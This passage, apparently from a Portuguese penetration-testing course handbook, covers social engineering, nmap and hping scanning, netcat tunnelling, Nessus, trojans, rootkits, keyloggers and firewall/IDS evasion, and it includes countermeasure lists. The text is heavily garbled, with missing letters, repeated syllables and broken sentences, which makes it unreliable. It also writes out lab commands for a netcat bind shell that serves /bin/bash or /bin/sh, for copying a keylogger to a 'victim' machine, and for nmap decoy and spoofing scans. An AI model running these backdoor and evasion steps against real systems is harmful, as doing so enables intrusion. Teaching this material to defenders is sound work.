6!)! Tipos de 7ngenEaria So.ial 6.3.1. Baseaa e( $essoas 4s tnias de engenaria soial baseada em pessoas possuem diversas araterístias que são utiliDadas para que o ataante onsiga as informaç%es que desejaE dentre elas podemos itar? ●

-isfares

●

Bepresentaç%es

●

Hso de argos de alto nível

●

●

4taques ao serviço de >elpdes: Observaç%es

6.3.2. Baseaa e( !o($'"aores ;sses ataques são arateriDados por utiliDarem tnias de ataque baseadas no desoneimento do usu3rio om relação ao uso orreto da inform3tia.


;
Cavalos de r7ia ane
●

;,mails falsos

●

8ebSites falsos

6!4! Aormas de ata&ue 6.4.1. Insier &""a!/s Insiders são pessoas de dentro da pr7pria organiDação. O objetivos por detr3s dos ataques de insiders podem ser v3riosE desde desobrir quanto o olega do lado ganaE at onseguir aesso a informaç%es onfideniais de um projeto novo para vender ao onorrente de seu empregador.

6.4.2. o'%o e ien"iae 4tualmenteE quando algum ria uma nova identidade baseando,se em informaç%es de outra pessoaE essa identidade  amada de XlaranjaY. -entro de empresasE o roubo de redeniaisE para aessar informaç%es que não estão aessíveis a todosE  um fato orriqueiroE que pode passar pelo simples soulder surfing à lonagem de I- Card.

6.4.3. Pisin# S!a( = uma forma de fraude eletr\niaE arateriDada por tentativas de adquirir informaç%es sigilosasE ou instalar programas maliiosos na m3quina alvo. 'a pr3tia do $ising surgem artimanas ada veD mais sofistiadas para ZpesarZ do inglVs fisJ as informaç%es sigilosas dos usu3rios.


6.4.4. <L O%f's!a"ion nia utiliDada para diminuir o tamano de HB/s muito grandes. ;
migre.me

●

o:m.me

●

digi.to

Isso pode ser utiliDado para oultar HB/ om parUmetros ou tags maliiososE omo tags de javasript para ataques de KSSE por e
6.4.5. D'($s"er Diin# = o ato de vasular li
6.4.6. Pers'as=o Os pr7prios a:ers vVem a engenaria soial de um ponto de vista psiol7gioE enfatiDando omo riar o ambiente psiol7gio perfeito para um ataque. Os mtodos b3sios de persuasão são? personifiaçãoE insinuaçãoE onformidadeE difusão de responsabilidade e a vela amiDade. Independente do mtodo usadoE o objetivo prinipal  onvener a pessoa que dar3 a informaçãoE de que o engeneiro soial  de fato uma pessoa a quem ela pode onfiar as informaç%es prestadas. Outro fator importante  nuna pedir muita informação de uma s7 veD e sim perguntar aos pouos e para pessoas diferentesE a fim de manter a aparVnia de uma relação onfort3vel.


6!-! 7ngenEaria So.ial Reversa Hm mtodo mais avançado de onseguir informaç%es ilíitas  om a engenaria soial reversa. Isto oorre quando o ataante ria uma personalidade que aparee numa posição de autoridadeE de modo que todos os usu3rios le pedirão informação. Se pesquisadosE planejados e bem e
6!6! ,o Te.E ;a.
dumpster diving

Capítulo 6 )ntendendo a )ngen/ar%a So&%al e o o-!e&/ 'a&(%ng - 77 ●

soulder surfing

●

lo: pi:ing

●

tailgating

6!! Contramedidas ●

6antena protegidoE não trabale em assuntos privados em loais pQblios.

●

Faça o desarte seguro de doumentos.

●

HtiliDe feaduras e tranas de boa qualidade e omprovado nível de segurança.

●

6antena bolsas e doumentos pessoais em segurança.

●

este onstantemente seus dispositivos de segurançaE Umeras e detetores de movimento.

●

ena uidado om Soulder Surfers.

●

+loqueie o tailgating.

●

6antena,se atento aos engeneiros soiais.

●

-V treinamento adequado aos funion3riosE prinipalmente os da 3rea de segurança.

6!2! 78er.í.io te9ri.o ;labore abai
Capítulo 6 )ntendendo a )ngen/ar%a So&%al e o o-!e&/ 'a&(%ng 'a&(%ng - 78

__________________________________________________________________________ __________________________________________________________________________ __________________________________________________________________________ __________________________________________________________________________ __________________________________________________________________________ __________________________________________________________________________ __________________________________________________________________________ __________________________________________________________________________

Capítulo 7 arredura" at%#a" pa""%#a" e furt%#a" de rede - 79

Capítulo  =arreduras ativasF passivas e urtivas de rede

!1! "#$etivos ●

6apear osts ativos na rede

●

Obter vers%es dos sistemas operaionais

●

;ntender aquisição de banners

●

Identifiar os serviços em e

!%! =arreduras =arreduras Internet Control 3essages Proto.ol IC3PJ O protoolo I$ Internet $rotoolJ  oneido omo Yprotoolo do melor esforçoYE devido a sua araterístia de sempre prourar o melor amino at uma dete determ rmin inad ada a rede rede ou ost ost.. O I$ poss possui ui um fiel fiel esu esude deir iroE oE um am amad ado o IC6$ IC6$ Int Inter erne nett Cont Contro roll 6ess 6essag ages es $r $rot oto ool olJJ eE de aor aordo do om om a BFC) BFC)52 52 o IC6$ IC6$  empregado quando? ●

Ruando um paote não onsegue egar ao destino

●

Ruando um roteador não onsegue enaminar um paote

●

Ruando um roteador desobre uma rota mais urta para um destino

Ferramentas omo o ping e o traeroute utiliDam o protoolo de ontrole IC6$ para determinar se um ost est3 vivo na rede e para mapear os roteadores at um destinoE por e3 uma infinidade de imp tApesE que podem ser onsultados no site da iana. Sabend Sabendo o dessa dessa partiu partiular laridad idadeE eE podemo podemoss utiliD utiliDar ar uma ferrame ferramenta nta simple simpless amada fpingE que pode failmente detetar todos os osts ativos numa redeE desde que os mesmos respondam imp. =fping -c -g AB"F8"B00"0$B> BP $dev$null P $tmp$ips"t4t

O nmap tambm pode ser usado om a opção s$ =nmap Qs AB"F8"B00"0$B>

'o aso do nmapE se utiliDarmos a opção $ing San ,s$JE observamos que mesmo se uma m3quina estiver bloqueando paotes IC6$E ele poder3 list3,la omo ativaE pois ele tambm envia paotes C$ para algumas portasE omo por e

4ssimE onseguimos a lista de todos os omputadores que respondem ping na rede.

!)! =arreduras TCP ;nquanto que as varreduras IC6$ nos informam a quantidade de osts ativos em uma redeE as varreduras C$ nos informam o nQmero de portas abertas em um determinado omputador. $ara desobrir se uma porta esta aberta ou feadaE o program programa a amado amado port port sann sanner er manipu manipula la uma arat araterí erísti stia a do proto protoolo olo C C$ $E amada ree 8aA >andsa:eE desrita na BFC )5".

-e aordo om a imagemE o lienteE que deseja onetar,se a um servidorE envia um pedido de one<ãoE ou sejaE no abeçalo do datagrama C$ ontm uma flag do tipo YST'Y. O servidorE que est3 apto a atender novas requisiç%es responde então om um datagrama C$ ontendo uma flag do tipo YST'Y] Y4CY. O liente então responde om um datagrama ontendo um Y4CYE e então  estabeleida a one<ão. -e aordo om a BFC )5"E que define os parUmetros para o protoolo C$E toda porta aberta deve responder om a flag YST']4CYE e toda porta feada deve responder om uma flag YBSY. $ara identifiar este omportamentoE vamos utiliDar a ferramenta lina de omando ping". @erifiando @erifiando o omportamento de um servidor om a porta * aberta.

Capítulo 7 arredura" at%#a" pa""%#a" e furt%#a" de rede - 82 = #ping --s0 >0 #eaders R 0 data )F lenL>F ipLAB" ipLAB"F8"0 F8"0"E "E  ttlLB8 ttlLB8 DO idL0FE idL0FE sportL80 sportL80 flagsLS/ flagsLS/ seqL0 seqL0 %inLF>B>0 %inLF>B>0 rttL>" ms

O mesmo omando agora em uma porta feada. = #ping --s0 >0 #eaders R 0 data )F ipLAB"F8"0"E ipLAB"F8"0"E ttlLB8 idL0FA sportL8 flagsL9/ seqL0 %inL0 rttL"0 ms

$ereba que as respostas sãoE S4E que representa um YST' ] 4CYE e um B4E que representa um YBeset ] 4CYE a resposta padrão para portas feadas.

!4! ,map 'map 'map pode pode ser ser ons onside iderad rada a uma uma das ferra ferrame ment ntas as mais mais ompl omplet etas as para para realiDar realiDar varreduras varreduras em redesE pois possui um nQmero nQmero imenso imenso de opç%esE opç%esE permitindo e
!-! 3'todos de =arredura 7.5.1. -sP $ing san? 4lgumas veDes  neess3rio saber se um determinado ost ou rede est3 est3 no ar. ar. 'map 'map pode pode envia enviarr pao paote tess IC6$ IC6$ Xe Xeo o requ reques estY tY para para verif verifi iar ar se determinado ost ou rede est3 ativa. >oje em diaE e

defaultJ e aso reeba BS o alvo est3 ativo. 4 tereira tnia envia um paote ST' e espera um BS ou ST',4C.

7.5.2. -s @ersion detetion? 4p7s as portas C$ e&ou H-$ serem desobertas por algum dos mtodosE o nmap ir3 determinar qual o serviço est3 rodando atualmente. O arquivo nmap,servie,probes  utiliDado para determinar tipos de protoolosE nome da apliaçãoE nQmero da versão e outros detales.

7.5.3. -sS C$ ST' san? nia tambm oneida omo Xalf,openYE pois não abre uma one<ão C$ ompleta. = enviado um paote ST'E omo se ele fosse uma one<ão real e aguarda uma resposta. Caso um paote ST',4C seja reebidoE a porta est3 abertaE enquanto que um BS,4C omo resposta india que a porta est3 feada. 4 vantagem dessa abordagem  que pouos irão detetar esse sanning de portas.

7.5.4. -sT C$ onnetJ san? = a tnia mais b3sia de C$ sanning. = utiliDada a amada de sistema sAstem allJ XonnetJY que envia um sinal as portas ativas. Caso a porta esteja aberta reebe omo resposta XonnetJY. = um dos san mais r3pidosE porm f3il de ser detetado.

7.5.5. -s< H-$ san? ;ste mtodo  utiliDado para determinar qual porta H-$ est3 aberta em um ost. 4 tnia onsiste em enviar um paote H-$ de * bAte para ada porta do ost. Se for reebida uma mensagem IC6$ Xport unreaableY então a porta est3 feadaE senão a porta pode estar aberta. $ara variar um pouoE a


6irosoft ignorou a sugestão da BFC e om isso a varredura de m3quinas 8indoGs  muito r3pida.

7.5.6. -s9 -s> -sN Stealt8 FI7: ;mas Tree ou 7ull) 4lguns fireGalls e filtros de paotes detetam paotes ST's em portas restritasE então  neess3rio utiliDar mtodos avançados para atravessar esses softGares. FI7? $ortas feadas enviam um paote BS omo resposta a paotes FI'E enquanto portas abertas ignoram esses paotes. ;sse mtodo não funiona om a plataforma 8indoGsE uma veD que a 6irosoft não seguiu BFC 5)"J ;mas Tree? $ortas feadas enviam um paote BS omo resposta a paotes FI'E enquanto portas abertas ignoram esses paotes. 4s flags FI'E HB9 e $HS> são utiliDados nos paotes FI' que  enviado ao alvo. ;sse mtodo não funiona om a plataforma 8indoGsE uma veD que a 6irosoft não seguiu BFC 5)"J 7ull? $ortas feadas enviam um paote BS omo resposta a paotes FI'E enquanto portas abertas ignoram esses paotes. 'enuma flag  ligada no paote FI'. ;sse mtodo não funiona om a plataforma 8indoGsE uma veD que a 6irosoft não seguiu BFC 5)"J

7.5.7. -T ?Paranoi@Snea/@Poli"e@Nor(al@&##ressie@InsaneA ;sse parUmetro seta a prioridade de varredura do 'map? ●

'aranoid !-T<"  muito lento na esperança de prevenir a deteção pelo sistema I-S. ;ste serialiDa todos os sans sanning não paraleloJ e geralmente espera no mínimo ( minutos entre o envio de paotes.

●

Snea=y !-T("  similar ao $aranoidE e<eto que somente espera 1( segundos entre o envio de paotes.

●

'olite !-T*" tem o signifiado para failitar a arga na rede e reduDir as anes de travar a m3quina. ;le serialiDa os testes e espera no mínimo


*.# segundos entre eles. ●

7ormal !-T+"  o omportamento default do 'mapE o qual tenta e
●

Aggressi&e!-T," esse modo adiiona um timeout de ( minutos por ost e nuna espera mais que 1.2( segundos para testar as respostas.

●

Insane !-T/"  somente adequando para redes muito r3pidas ou onde voV não se importa em perder algumas informaç%es. 'esta opção o timeout dos osts aontee em )( segundos e espera somente *." segundos por teste individual.

'p*+es Interessantes: -p  tili6ado para especificar portas -'  (ostra a vers3o do S"' -0  Desativa I?( tipo 8 e o T? /? na porta 80

!6! Pr/ti.a dirigida 7.6.1. *a$eano $or"as a%er"as e( '( serior =nmap -sT AB"F8"0"E

;sta varredura  o omportamento padrão do 'map que  utiliDado quando não temos privilgios de root ou em redes Ipv0. 'esta varreduraE o 'map utiliDa uma amada de sistema do tipo YonnetJYE e seu desempeno depende fortemente da implementação da pila C$&I$ feita no sistema operaional. Os resultados possíveis para esta varredura são? ●

Open&Filtered? 4berta e aeitando one<%es e&ou filtrada por fireGall

●

Closed&Filtered? $orta feada e&ou filtrada por fireGall


@arreduras baseadas em fim de one<ão? =nmap -sO AB"F8"0"E

;sta varredura e
Open&Filtered? 4berta e&ou filtrada por fireGall

●

Closed&Filtered? Feada e&ou filtrada por fireGall

@arredura 'ula? =nmap -sN AB"F8"0"E

4lguns sistemas operaionais que não seguem a BFC estritamente podem dar respostas diferentes do esperado. Sabendo deste omportamentoE podemos enviar um paote sem nenum onteQdo e então observar a resposta do alvo. 4s respostas podem variar de sistema operaional para sistema operaionalE mas geralmente reebemos? ●

Open&Filtered? 4berta e&ou filtrada por fireGall

●

Closed? Feada

@arredura para identifiação de fireGalls? =nmap -s/ AB"F8"0"E

O objetivo desta varredura  mapear as regras de um fireGall para determinar se o mesmo faD tratamento ompleto de one<ão ou não.


Os Qnios resultados neste tipo de varredura são? ●

Filtered? 4 porta est3 protegida por fireGall

●

Hnfiltered? 4 porta não est3 protegida por fireGall

!! Tunelamento O tunelamentoE basiamenteE  a tnia de enapsular onjuntos de dados que trafegam em rede dentro de outro onjunto de dadosE de forma que a rota que os primeiros iam tomar seja onduDida para um lugar ou de uma maneira que sem o enapsulamento eles não poderiam faDer.

;
$roteger dados atravs de uma one<ão riptografada não suportada loalmente

●

BealiDar uma one<ão ujo protoolo seria bloqueado não fosse o uso do tQnel

●

Conetar,se a um destino bloqueado para one<ão direta

●

Conetar,se a uma m3quina de rede interna omo se fosse de dentro para fora

●

6asaramento de I$.

;
Capítulo 7 arredura" at%#a" pa""%#a" e furt%#a" de rede - 88 ●

'etat anivete suíço C$&I$J

●

OpenSS> sell remoto&tQnel riptogr3fioJ

●

>ttptunnel tQnel ttp para atravessar fireGallsJ

●

Cor:sreG tunela SS> em ttp para atravessar fireGallsJ.

!2! Pr/ti.a dirigida 7.8.1. T'nelano !o( o Ne"!a"

4bra trVs terminais. 4 idia  que um primeiro terminal vai esutar em uma porta de forma regularE um segundo vai abrir um tQnel de uma porta arbitr3ria at a porta em que o servidor do primeiro terminal estiver esutando e o tereiro terminal vai se onetarE tambm de maneira regularE à porta arbitr3ria do tunel que levar3 essa one<ão at a sua saída no serviço do primeiro terminal. ●

1 servidorJ? U nc -l -vv 0BF V $)in$)as#

●

2 tQnelJ ? U nc -l -vv 0B! V nc local#ost 0BF

●

" lienteJ? U nc local#ost 0B!


!! nonKmi>er Os programas de anonAmiDer funionam basiamente para oultar seus dados enquanto navega na internet. 'ormalmente a apliação utiliDada para isso  um pro
ttp?&&GGG.torprojet.org&

$rivo
ttp?&&GGG.privo

!10! Pr/ti.a dirigida 7.10.1. Nae#ano anoni(a(en"e 4esse o site GGG.soGmAip.om e veja seu endereço I$ e o loal de onde est3 aessando. Instale o anon,pro
;ntre no navegador e onfigure o pro
!11! Contramedidas 6anter regras de fireGall bem onfiguradasE evitando que determinados tipos de varredura possam ser realiDadas. 'ão permitir que usu3rios na rede tenam aesso às onfiguraç%es do navegador para onfigurar pro

Capítulo 2 7numeração de inormaç*es e serviços

2!1! "#$etivos ●

6apear a rede

●

-esobrir serviços e vers%es sendo e
Capítulo 8 )nueração de %nforaç.e" e "er#%ço" - 92

2!%! 7numeração 4s tnias de enumeração são utiliDadas omo um omplemento às fases de fingerprint e varredura. O objetivo  desobrir serviços e vers%es que estão sendo e
2!)! &uisição de #anners Falaremos agora a respeito da aptura de informaç%es sobre os serviços que estão rodando em uma m3quina,alvo por meio da leitura de seus respetivos banners que são aquelas mensagens que ontm informaç%es omo o tipo do serviçoE sua versãoE et. ;ssas informaç%es visam estabeleer um levantamento dos serviços utiliDadosE onde o foo de um possível ataque pode estar voltado para a e
8.3.1. T;!ni!as !lssi!as Sem utiliDar ferramentas espeífiasE  possível onseguir informaç%es dos serviços que estão sendo e
Capítulo 8 )nueração de %nforaç.e" e "er#%ço" - 93 =ftp AB"F8"B00"B!>

Obtendo banner de um servidor de e,mail? =telnet AB"F8"B00"B0! B! ;@' WdomínioX (/I@ O9'(: Wendere*oKorigemX 9?T T': Wendere*oKdestinoX D/T/  """ msg """ J " quit

Com o omando telnetE podemos tentar onetar em todas as portas e
8.3.2. 9erra(en"as ●

'map BealiDa varredura de redeE busando osts ativosE portas abertas e serviços

sendo e
Kprobe2

4nalisa banners de sistemas operaionaisE omparando om um bano de dados internoE onde ompara,os e informa o S.O. utiliDado e a versão do mesmo. ●

4map 4naliDa banners de serviços que estão sendo e

versão. ●

4utoSan

FaD varredura na rede e informa osts ativosE portas abertas e serviços sendo e
6altego

FaD varredura de redesE serviçosE protoolosE domínios e v3rias outras opç%esE informando de forma gr3fia a relação entres os osts ativos. ●

/anmap @arre toda a rede e aptura paotesE riando ao longo de sua e
arquivo .$'9 om o mapa da redeE informando grafiamente a relação das m3quinas enontradas. ●

Ceops @arre toda a rede em busa de osts ativosE informando grafiamenteE atravs

de um mapaE os osts ativosE S.O. sendo e
'essus

4travs de plugins espeífiosE varre um determinado alvoE informando as vulnerabilidades enontradasE inlusive e
2!4! Pr/ti.a dirigida 8.4.1. Ca$"'rano %anner e a$li!a)es e for(a a"ia 1 , 4 partir da sinta
Capítulo 8 )nueração de %nforaç.e" e "er#%ço" - 95 nmap -sY -' WipKalvoX Hpro)eB Qp T?:80:open ZipP /map ZipP ZportaP

2!-! 3apeando grai.amente a rede Os programas de lina de omando funionam muito bem para varrer redesE desobrir osts ativosE serviços sendo e
8.5.1. Lan(a$ e Ceo$s ;

8.5.2. &'"oS!an

8.5.3. *al"e#o


2!6! @es.o#rindo =ulnera#ilidades 8.6.1. Ness's 'essus  uma das ferramentas mais oneidas para desoberta de vulnerabilidades em redes e sistemas. Com um onjunto sempre atualiDado de pluginsE baseado em sua linguagem de sript amada '4S/E ele faD a varredura de todo os I$s definidos em sua onfiguraçãoE busando vulnerabilidades e breas na onfiguração dos serviçosE informando,os em um relat7rio finalE onde define o grau de riso das vulnerabilidades enontradas. Iniialmente o 'essus era um softGare opensoureE mas a partir da versão ".* passou a ser uma ferramenta omerialE disponível gratuitamente apenas para uso domstio. $ortantoE  possível bai
utiliDar a ferramenta em testes partiulares. @amos ver no t7pio a seguir omo bai
2!! Pr/ti.a dirigida 8.7.1. Ins"alano o Ness's 1.

4esse o endereço nessus.org&doGnload&

2.

+ai

".

Instale o paote?

=dp&g -i Nessus->"B"B-de)ian!Ki8F"de)

#.

4diione um usu3rio que ser3 o administrador do 'essus?

=$opt$nessus$s)in$nessus-adduser

8.7.2. e#is"rano e ini!iano 1. 4esse GGG.nessus.org®ister 2. ;sola a versão $rofessional ou >ome a versão >ome  gratuitaJ ". Informe um endereço de e,mail para onde eles enviarão o nQmero de registroJ =$opt$nessus$)in$nessus-fetc# --register 4444-4444-4444-4444 =$opt$nessus$s)in$nessus-update-plugins =$etc$init"d$nessusd start

#. 4esse em seu broGser? ttps?&&12).*.*.1?"#&

2!2! @einindo vetores de ata&ue = importanteE antes de iniiarmos qualquer ação efetiva ontra nosso alvoE definirmos as v3rias possibilidades de ataques e

$ara definirmos os vetoresE e olo3,los em um mapa gr3fio que failite sua visualiDação e ompreensãoE vamos utiliDar uma tnia amada Xmapas mentaisYE desenvolvida para failitar a reunião de informaç%es de forma resumida de ondensada em um mapa gr3fioE e posterior ompreensão das mesmas sem perder seu prinipal signifiado e onteQdos. @amos utiliDar um programa espeífio para issoE e om a reunião das informaç%es onseguidas at o momentoE definirmos os vetores de ataque. -evemos atentar queE ao longo do ursoE novos vetores serão aresentados e alteradosE de aordo om a evolução de nosso onteQdo. @ejamos abai
2!! Pr/ti.a dirigida 1. @amosE em primeiro lugarE instalar o softGare neess3rio para a riação de mapas mentais?

=aptitude install freemind


2. HtiliDando as informaç%es reunidas at o momentoE vamos definir os vetores de ataqueE lassifi3,los e riar um mapa mental om os mesmos. ". 4resente isso ao relat7rio.


Como a maioria das varreduras e apliativos de mapeamento utiliDam flags de one<ãoE uma boa onfiguração de regras do fireGall j3 bloqueia a maiorias das tentativas de varreduras.

●

6anter I-S&I$S bem onfigurados para detetar e bloquear I$s que realiDam tentativas de varreduras.

●

BealiDar onstantemente auditorias nas regras de I-S&I$S e fireGallsE testando se os mesmos podem ser burlados e omo. ; a partir dissoE riar e&ou adaptar regras.


Capítulo  Tro$ansF Ha.
!1! "#$etivos ●

;ntender a diferença entre vírus e Gorms

●

;ntender o funionamento das ba:doors

●

;ntender as funionalidades do trojan

●

;ntender o oneito de root:it

Capítulo 9 !roan" a&(door" íru" *oot(%t" e or" - 102

!%! Ha.
!)! Cavalo de Tr9ia ou Tro$an ;orse Segundo os istoriadoresE os gregos tentaram invadir r7ia e sempre eram derrotados pelos troianos. ;ntãoE os gregos tiveram uma brilante idia de riar um avalo de madeira onde eles iriam oloar diversos soldados e presentear os troianos omo reoneimento da potenial defesa e delaração de paD. Com issoE os gregos onseguiram egar ao oração de r7ia sem passar pelos muros e soldados troianos. ;ntãoE enquanto os troianos omemoravam a vit7ria e desansavam tranquilamenteE os soldados gregos saíram do avalo e ataaram r7iaE que aabou sendo onquistada pelos gregos. ;ssa ist7ria fiou oneida omo Cavalo de r7ia. ;ntãoE depois de v3rios sulos desse aonteimentoE aabamos desobrindo que esse truque foi ressusitado.


Os avalos de tr7ia dos omputadores são programas que aparentemente funionam normaisE mas na verdade eles aabam realiDando outra tarefa sem que o usu3rio tome oneimento. Hm e
!4! Rootser-land Os bin3rios originais são alterados por bin3rios modifiadosE alterando o flu

?ernel-land 4diiona 7digo maliioso no :ernel atravs de /6 /oadable ernel 6oduleJE driversE inserção de 7digo direto na mem7riaE oo: de sAsall table Se bem implementadoE  pratiamente impossível de ser detetado om o SO em e
>ide Itself? O m7dulo se oultaE não apareendo na listagem de m7dulosE tornando assim impossível de desarreg3,lo

●

File >ider? odos os arquivos que possuir uma pr,determinada palavra em seu nome serão oultos da visualiDação

●

$roess >ider? odos os proessos que possuir uma pr,determinada palavra em seu nome serão oultos da visualiDação

●

So:et +a:door? Se um paote om um tamano predefinido ontendo uma string espeifiada no root:it for reebidoE ser3 iniiar3 um programaE normalmente uma ba:door.

!-! =írus e Gorms @írus e Gorms podem ser usados para infetar e modifiar um sistema a fim de permitir que um ataante gane aesso ao mesmo. 6uitos vírus e Gorms arregam trojans e ba:doors. Hm vírus e um Gorm são softGares maliiosos malGareJ. 4 prinipal diferença entre o vírus e o Gorm  que o primeiroE preisa ser e

anto os vírus quanto os avalos de tr7ia não onseguem infetar um omputador e
!6! ,et.at 'etat  uma ferramenta usada para ler e esrever dados em one<%es de rede usando o protoolo C$&I$. -ada sua grande versatilidadeE o 'etat  onsiderado pelos a:ers o anivete suíço do C$&I$E podendo ser usado para faDer desde portsans at brute fore atta:s. O nome netat vem do omando ZatZ do /inu<&Hni<. O at onatena arquivos e envia para a saída padrão stdoutJ. O netat faD pratiamente o mesmoE porm ao invs de onatenar arquivosE o netat onatena so:ets C$ e H-$. $ossui inQmeras funç%esE dentre as quais? ●

@arredura de portas

●

+anner grabbing

●

Criação de ba:door

●

unelamento e et.

4lm de failitar a vida do administrador de redeE tambm failita a vida de um invasorE portantoE uidadoW 6ate seu proesso e remova o bin3rio sempre ap7s a


utiliDaçãoE aso não queira tornar,se a vítima.

.6.1. O$)es o Ne"!a" ●

,e omando , ;O/;E j3 que permite que usu3rios disponibiliDem programas para qualquer um onetado a rede

●

,i , ;speifia o intervalo de tempo no qual as linas de te
●

,l , Coloa no netat em estado de esuta listeningJ

●

,/ , Coloa no netat em estado de esuta listeningJE reiniiando o netat om a mesma lina de omando aso a one<ão fee

●

,n , Força o netat a usar apenas endereços de I$ numriosE sem faDer onsultas a servidores -'S

●

,o filename , Hsando para obter um log dos dados de entrada ou saídaE em formato e
●

,p , ;speifia a porta a ser usadaE sujeito a disponibilidade e a restriç%es de privilgio

●

,r , FaD as portas do portsan serem esolidas aleatoriamente

●

,s , ;speifia o endereço I$ da interfae usada para enviar os paotes. $ode ser usado para spoofing de I$sE bastando apenas onfigurar uma interfae do tipo et*?* usando o ifonfigJ om o I$ desejado

●

,t , $ermite usar o n para riar sess%es de telnet por sript. $reisa estar ompilado om a opção ,-;/';

●

,u , Hsar H-$ ao invs de C$

Capítulo 9 !roan" a&(door" íru" *oot(%t" e or" - 107 ●

,v , Controla o nível de mensagens mostradas na tela

●

,G , /imita o tempo m3
●

,D , $ara evitar o envio de dados atravs de uma one<ão C$E e limitar os dados de uma one<ão H-$.

.6.2. Ne"!a" - <"iliEa)=o Transfer@ncia de ar5ui&os) ●

'o servidor? = netcat -l -p !0!0 P pass"t4t

●

'o liente? = cat pass"t4t V netcat ipKserver !0!0

>so como scanner = nc -vv BE"0"0" BB-B!

.6.3. Fn!aeano Ne"!a"s 'etat foi desenvolvido para trabalar om um pipelineE então naturalmente a saída de uma instUnia do 'etat pode alimentar a entrada de outro. 4bai

O 'etat em modo de esuta no ost2E ao reeber uma one<ão ria um Znovo netatZ para falar om o ost" e oneta a entrada e saída do programa em e
!! LeKlogger eAlogger são programas utiliDados para gravar tudo aquilo que o usu3rio digita no telado. 4lgunsE mais avançadosE armaDenam sreensots da tela ou at mesmo a 3rea ao redor do ponteiro do mouse onde oorre um li:. ;
●

4rdama<  8indoGs $A:eAlogger  /inu< , #ttp:$$sourceforge"net$pro1ects$p<&e
4lm dos :eAloggers l7giosE temos os :eAloggers físiosE que podem ser omprados em lojas virtuais por pouos d7lares.


;sses :eAloggers físios se pareem om adaptadores de telados $S2&HS+E sendo instalados entre o abo do telado e a entrada $S2 da C$HE s7 que eles armaDenam dentro de uma mem7ria flas tudo o que  digitado no telado XgrampeadoY. ObviamenteE que a instalação de um dispositivo dessesE seja l7gio ou físioE neessita do uso de reursos de engenaria soial para que o mesmo seja instalado na m3quina do alvo. ; no aso do :eAlogger físioE o ataante preisa ter aesso físio à m3quinaE tanto para instalarE quanto para pegar de volta o dispositivo.

!2! Pr/ti.a dirigida 1. @amos riar uma ba:door e aessar a m3quina alvo atravs dela. 'a m3quina do ataante e000

'a m3quina da vítima e000 -e $)in$s#

2. Copiar o pA:eAlogger para a m3quina alvo e e

!! Contramedidas ●

6onitorar onstantemente os serviços e
●

BealiDar varreduras onstantes utiliDando ferramentas espeífiasE omo o HnideE :root:it e o SeuritA 4uditors Besear 4ssistant S4B4JE por e
●

;vitar realiDar a maioria das tarefas omo rootE j3 que para a infeção e alastramentoE a maioria dos malGares preisam de privilgios de root.


Capítulo 10 Ignorando Proteç*es

10!1! "#$etivos ●

Coneer os meanismos de evasão de fireGall

●

Coneer as tnias de evasão de I-S&I$S

●

;ntender as tnias de anti,forense

Capítulo 10 Ignorando roteç.e" - 112

10!%! 7vasão de AireGall+I@S .om ,map 4s tnias de evasão de fireGall e I-S são utiliDadas para evitar que qualquer tipo de apliação que ontena filtros e ontroles de aessoE possam detetar as aç%es do ataante. anto ferramentas espeífias quanto parUmetros de ferramentas ujo objetivo de utiliDação não  espeifiamente esseE podem ser usados. 4bai
●

-f N fragmenta paotesE inluindo paotes I$. 4 idia  dividir os abeçalos C$ em v3rios paotesE difiultando a deteção por filtros de paotesE I-S e et.

●

-4 decoy(B:decoy*BD:%EDE...h N realiDa uma varredura utiliDando isas. FaD pareer que v3rios osts da redeE juntamente om seu I$E estão varrendo o alvo. -esse modoE o I-S pode reportar (,1* varreduras em um Qnio I$E mas não saber3 definir quais são isas inoentes e qual I$ est3 realmente realiDando a varredura.

●

-S I'AddressN N realiDa um I$ spoofingE faDendo om que um I-S report uma varredura sendo realiDada a partir de um outro I$E que não o seuE mas que  definido por voV.

●

--source-port portnumber N N realiDa um port spoofingE permitindo que seja definido no paote de qual porta ele teoriamente foi enviado. ;ssa tnia e
●

--randomi.e-8osts N ordena de forma aleat7ria os osts alvos de uma varredura. Isso pode tornar a varredura menos 7bvia para sistemas de


monitoramento de redeE espeialmente se ombinado om opç%es de ZsloG timingZ. ●

--spoof-mac %AC addressN N faD um 64C spoofingE atribuindo um endereço 64CE definido pelo ataanteE para todos os frames eternet enviados.

10!)! AireGall Tester FireGall ester FesterJ  uma ferramenta riada para testar regras de filtragem fireGalls e as apaidades Intrusion -etetion SAstem I-SJ. 4 ferramenta onsiste em 2 sripts perlE um injetor de paotes ftestJ e um sniffer passivo listening sniffer  ftestdJ.

10.3.1. Cara!"er+s"i!asG ●

fireGall testing

●

I-S testing

●

Simulação de one<%es reais C$ para inspeionar fireGalls e I-S.

●

Fragmentação de I$ & Fragmentação de C$

●

nias de evasão de I-S

4onload , ttp?&&dev.inversepat.om&ftester 4ocumentação , #ttp:$$dev"inversepat#"com$ftester$ftester"#tml

10.3.2. <"iliEa)=oG

= "$ftest = "$ftestd


10.3.3. Sin"aeG

●

$ara paotes C$ e H-$? I$_origem?porta_origem?I$_destino?porta_destino?Flags?$rotoolo?ipo_serviço

●

$ara paotes IC6$?

I$_origem?porta_origem?I$_destino?porta_destino?Flags?IC6$?tipo_imp?7dig o_imp E3emplo) 152.10.*.1?1,1*2#?1*.).*.1?2*,2(?S?C$?22

10!4! @ete.tando ;oneKpots -ifiilmente uma organiDação ou empresa que esteja ontratando profissionais para realiDar um pentestE possui um oneApot em sua rede. 6as ainda assim e
>oneApot de bai
–

>oneApot de alta interatividade

O oneApots de bai

respostas são mais onsistentes e o omportamento  bem pr7$ de alta interatividadeE apenas a e$ ou não. -ei
'map

●

'essus

●

Open@4S

10!-! Pr/ti.a dirigida @arredura om Spoofing e -eoA? nmap -S AB"F8"0" -p BB -' -sY -0 -n AB"F8"B00" nmap -sS Q-source-port ! -p 80 -0 -n -D AB"F8"0"B>, AB"F8"0"B! AB"F8"B00"4

1. BealiDar essas varreduras nos miros viDinosE om o Giresar: rodando. 2. -esobrirE na redeE qual o I$ onde 3 um oneApot sendo e

6anter regras de fireGall e I-S muito bem onfiguradas

●

6anter a atenção onstante em logs de equipamentos que são respons3veis pela proteção da rede

●

'ão onfiar em apenas um fireGall ou I-SE ompartimentaliDando a rede


Capítulo 11 T'.ni.as de Aorça Hruta

11!1! "#$etivos ●

Coneer os meanismos de geração de Gordlist

●

Coneer ferramentas de brutefore

●

;ntender o que  boa polítia de senas

Capítulo 11 !&n%&a" de orça ruta - 117

